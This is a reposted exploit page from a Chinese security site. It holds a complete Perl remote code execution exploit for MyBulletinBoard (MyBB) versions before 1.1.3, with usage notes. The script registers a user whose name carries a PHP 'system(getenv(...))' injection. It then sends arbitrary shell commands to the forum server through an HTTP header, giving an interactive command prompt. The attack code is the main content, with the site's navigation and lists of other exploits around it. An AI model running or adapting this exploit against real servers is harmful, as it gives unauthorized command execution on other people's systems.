首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit
来源:jolascoaga@514.es 作者:jolascoaga 发布时间:2006-06-14  

#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
# this step needs a graphic confirmation so the exploit writes a file
# in /tmp/file.png, you need to
# see this img and put the text into the prompt. If everything is ok,
# you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
# for debugging.
# - After you have created the exploit or if you have a valid non common
# user, you can execute shell commands.
#
# TIPS:
# * Sometimes you have to change the thread Id, --tid is your friend ;)
# * Don't forget to change the email. You MUST activate the account.
# * Mejor karate aun dentro ti.
#
# LIMITATIONS:
# * If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug,
'1' => \$first_time,
'tid=s' => \$tid,
'delete' => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
$host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
login() if !$logged;

print "mybibi> "; # lost connection
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub send {
chomp (my $cmd = shift);
my $h = $host.$dir."/newthread.php";
my $req = POST $h, [
'subject' => '514',
'message' => '/slap 514',
'previewpost' => 'Preview Post',
'action' => 'do_newthread',
'fid' => $tid,
'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
];
$req->header($uservar => $cmd);
print $req->as_string() if $debug;
my $res = $ua->request($req);
if ($res->content =~ /You may not post in this/) {
print "[!] don't have perms to post. Change the Forum ID\n";
} else {
my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
print $data;
}

}
sub login {
my $h = $host.$dir."/member.php";
my $req = POST $h,[
'username' => $username,
'password' => $password,
'submit' => 'Login',
'action' => 'do_login'
];
my $res = $ua->request($req);
if ($res->content =~ /You have successfully been logged/is) {
print "[*] Login succesful!\n";
$logged = 1;
} else {
print "[!] Error login-in\n";
}
}

sub help {
print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}

sub create_user {
# firs we need to get the img.
my $h = $host.$dir."/member.php";
print "Host: $h\n";

$req = HTTP::Request->new (GET => $h."?action=register");
$res = $ua->request ($req);

my $req = POST $h, [
'action' => "register",
'agree' => "I Agree"
];
print $req->as_string() if $debug;
$res = $ua->request($req);

my $content = $res->content();
$content =~ m/.*(image\.php\?action.*?)\".*/is;
my $img = $1;
my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
$res = $ua->request ($req);
print $req->as_string();

if ($res->content) {
open (TMP, ">/tmp/file.png") or die($!);
print TMP $res->content;
close (TMP);
print "[*] /tmp/file.png created.\n";
}

my ($hash) = $img =~ m/hash=(.*?)$/;
my $img_str = get_img_str();
unlink ("/tmp/file.png");
$img_str =~ s/\n//g;
my $req = POST $h, [
'username' => $username,
'password' => $password,
'password2' => $password,
'email' => $email,
'email2' => $email,
'imagestring' => $img_str,
'imagehash' => $hash,
'allownotices' => 'yes',
'receivepms' => 'yes',
'pmpopup' => 'no',
'action' => "do_register",
'regsubmit' => "Submit Registration"
];
$res = $ua->request($req);
print $req->as_string() if $debug;

open (OUT, ">mybibi_out.html");
print OUT $res->content;

print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str ()
{
print "\nNow I need the text shown in /tmp/file.png: ";
my $str = <STDIN>;
return $str;
}
exit 0;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CesarFTP 0.99g (MKD) Remote Bu
·MS Windows (NtClose DeadLock)
·blur6ex <= 0.3.462 (ID) Adm
·MS Windows XP/2K (Mrxsmb.sys)
·RCblog <= 1.03 (post) Remot
·CesarFTP 0.99g (MKD) Remote Bu
·0verkill 0.16 (ASCII-ART Game)
·Pico Zip 4.01 (Long Filename)
·Lanifex DMO <= 2.3b (_incMg
·bitweaver <= 1.3 (tmpImageP
·phpAtm <= 1.21 (include_loc
·Mambo <= 4.6rc1 (Weblinks)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved